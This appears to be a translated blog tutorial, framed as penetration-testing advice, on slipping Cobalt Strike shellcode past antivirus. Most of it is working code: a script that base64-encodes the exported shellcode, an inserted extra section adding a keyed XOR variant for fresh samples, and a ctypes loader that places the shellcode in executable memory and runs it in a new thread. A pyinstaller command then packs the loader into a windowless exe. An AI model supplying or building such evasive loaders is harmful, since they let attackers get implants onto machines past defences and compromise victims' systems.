Preface

During a penetration test you will often find that the target host runs anti-virus software and our trojan gets flagged and removed, so we need a way around the AV to get the host to check in to Cobalt Strike or Metasploit.

What is shellcode?

"Shellcode is a piece of code executed to exploit a software vulnerability; it is machine code written out as hex bytes, and it got its name because it so often hands the attacker a shell."

What is shellcode obfuscation?

Put simply, it is transforming our shellcode so that its bytes no longer appear in the clear, for example with base64, AES and so on. Note that base64 is an encoding rather than encryption: it needs no key and anyone can reverse it, so it only defeats detection that looks for the raw byte pattern in the file.

Implementation process

1. Generate the shellcode with Cobalt Strike
2. Do some simple processing of the payload.py shellcode file
3. Encrypt the extracted shellcode
4. The shellcode loader decrypts the encrypted shellcode

Generate shellcode with Cobalt Strike

Simple processing of the payload.py shellcode file

Cobalt Strike's Python export spreads the bytes over several buf += "..." lines; collapse them into a single quoted string so the script below can slice it between the first and last double quote.

Encrypt the extracted shellcode
# coding=utf-8
import base64

# Read the shellcode file (payload.py, collapsed to one quoted string)
with open('payload.py') as f:
    shellcode = f.read()

# Take the text between the first and last double quote
s1 = shellcode.find("\"") + 1
s2 = shellcode.rfind("\"")
shellcode = shellcode[s1:s2]
# print(shellcode)

# base64-encode the escaped shellcode text and write it to base64.txt
base64_shellcode = base64.b64encode(shellcode.encode('UTF-8'))
with open('base64.txt', 'wb') as shell:
    shell.write(base64_shellcode)
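The following is an added example and not the article's own code. It covers two things the text above only describes: it parses Cobalt Strike's multi-line Python export directly instead of relying on the first/last-quote slice, and it puts the article's base64 wrapping next to a keyed variant so the difference between "encoding" and "encryption" is visible. Assumptions: the payload format is one buf += "..." line per chunk (the sample bytes are constructed placeholders, not a real stager), XOR_KEY is an arbitrary key, and repeating-key XOR stands in for the AES the article mentions because AES needs a third-party library. decode_base64 mirrors what the loader below does with base64.b64decode and codecs.escape_decode.

```python
# Added example, not the article's own code: parse Cobalt Strike's Python
# payload export and produce the article's base64 blob plus a keyed XOR blob.
import base64
import codecs
import re

# Constructed sample in the shape of a Cobalt Strike "Python" export
# (assumption: one `buf += "..."` line per chunk). The bytes are placeholders,
# not a real stager.
SAMPLE_PAYLOAD_PY = r'''buf =  ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
buf += "\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2"
'''

# Arbitrary key for the XOR variant (assumption; pick your own per build)
XOR_KEY = b"k3y!"


def extract_escaped_shellcode(text: str) -> str:
    """Join every double-quoted fragment into one '\\x..' escaped string.

    Unlike find('"')/rfind('"') this tolerates the multi-line `buf += "..."`
    layout, because the `"\\nbuf += "` glue between chunks is never captured.
    """
    return "".join(re.findall(r'"((?:[^"\\]|\\.)*)"', text))


def escaped_to_bytes(escaped: str) -> bytes:
    """Turn '\\xfc\\x48' text into raw bytes, as the loader's escape_decode does."""
    return codecs.escape_decode(escaped.encode("ascii"))[0]


def encode_base64(escaped: str) -> bytes:
    """The article's scheme: base64 of the escaped text. No key is involved,
    so anyone holding the loader can reverse it; it only hides the literal
    '\\xfc\\x48...' string from a plain string scan."""
    return base64.b64encode(escaped.encode("utf-8"))


def decode_base64(blob: bytes) -> bytes:
    """What the loader does: base64 -> escaped text -> raw bytes."""
    return escaped_to_bytes(base64.b64decode(blob).decode("utf-8"))


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_xor(raw: bytes, key: bytes = XOR_KEY) -> bytes:
    """Keyed variant: XOR the raw bytes, then base64 so the result still pastes
    into a string literal. Stand-in for the AES the article mentions; the
    structure (a key plus a reversible transform) is the same."""
    return base64.b64encode(xor_bytes(raw, key))


def decode_xor(blob: bytes, key: bytes = XOR_KEY) -> bytes:
    """Loader side of encode_xor."""
    return xor_bytes(base64.b64decode(blob), key)


def build_blobs(payload_text: str) -> dict:
    """Produce both blobs from a payload.py text, plus the raw bytes for checks."""
    escaped = extract_escaped_shellcode(payload_text)
    raw = escaped_to_bytes(escaped)
    return {
        "raw": raw,
        "base64": encode_base64(escaped),
        "xor": encode_xor(raw),
    }


if __name__ == "__main__":
    blobs = build_blobs(SAMPLE_PAYLOAD_PY)
    print("raw bytes:  ", len(blobs["raw"]))
    print("base64 blob:", blobs["base64"].decode())
    print("xor blob:   ", blobs["xor"].decode())
```

Whichever blob you paste into the loader, the loader must apply the matching decode: decode_base64 for the article's scheme, decode_xor with the same key for the keyed one. The XOR blob changes completely when the key changes, which is what lets you rebuild a fresh sample without touching the shellcode itself.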
Write the loader

import base64
import codecs
import ctypes

# Paste the contents of base64.txt here
shellcode = ""
# Reverse the encoder's two steps: base64, then the "\x.." escapes back to bytes
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# VirtualAlloc returns a 64-bit pointer; without this ctypes truncates it to a C int
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# Allocate RWX memory: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# Copy the shellcode into the allocation
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# Create a thread whose start address is the first byte of the shellcode
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# Block until that thread finishes (-1 as a DWORD is INFINITE)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
Put the encrypted shellcode into shellcode = "" and package the script into an exe with pyinstaller (-F builds a single file, -w suppresses the console window):
pyinstaller -F bypassav.py -w
Test the detection rate
Closing
When I have time I will write a follow-up on separating the shellcode from the loader; every step above can be automated, and I have already built that into my own platform.
Source: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650502553&idx=2&sn=5d8fd2c16d9f6abd0adf0e9947012abe&chksm=83ba107db4cd996b05675f9bc84a7edacbb4a15316402c90429fbb946bb24d1fc495f76efd59#rd